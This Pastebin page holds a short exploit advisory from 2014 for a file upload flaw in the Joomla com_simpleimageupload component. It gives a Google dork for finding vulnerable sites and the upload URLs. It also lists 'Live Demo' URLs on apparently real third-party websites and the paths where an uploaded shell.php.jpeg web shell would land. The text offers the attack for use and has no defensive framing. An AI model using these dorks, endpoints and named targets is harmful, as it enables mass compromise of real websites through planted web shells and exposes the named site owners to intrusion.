Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ,------. ,--. ,-----. ,--.
- | .-. \ ,---. ,--,--. ,-| | ,---. ' .-. ',--.,--.| |
- | | \ :| .-. :' ,-. |' .-. |( .-' | | | || || || |
- | '--' /\ --.\ '-' |\ `-' |.-' `)' '-' '' '' '| |
- `-------' `----' `--`--' `---' `----' `-----' `----' `--'
- dead_s0ul@outlook.com
- Category web applications
- Platform php
- # Exploit Title: Joomla (com_simpleimageupload) File Upload Vulnerability
- # Date: 05/11/2014
- # Exploit Author: Donnazmi
- # Tested on: Windows + Linux
- # Google dork: inurl:/index.php?option=com_simpleimageupload
- ------------------------------------------------------------------------
- # Exploit
- # -Live HTTP Header-
- 1)
- http://localhost/path/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext
- 2)
- http://localhost/path/administrator/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext
- Live Demo :
- http://www.bonyadtabari.ir/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext
- http://phurithat.ac.th/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_content
- http://www.aviatime.com/en/people/administrator/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext
- # Shell path:
- http://localhost/path/images/pic/shell.php.jpeg
- http://localhost/path/images/shell.php.jpeg
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement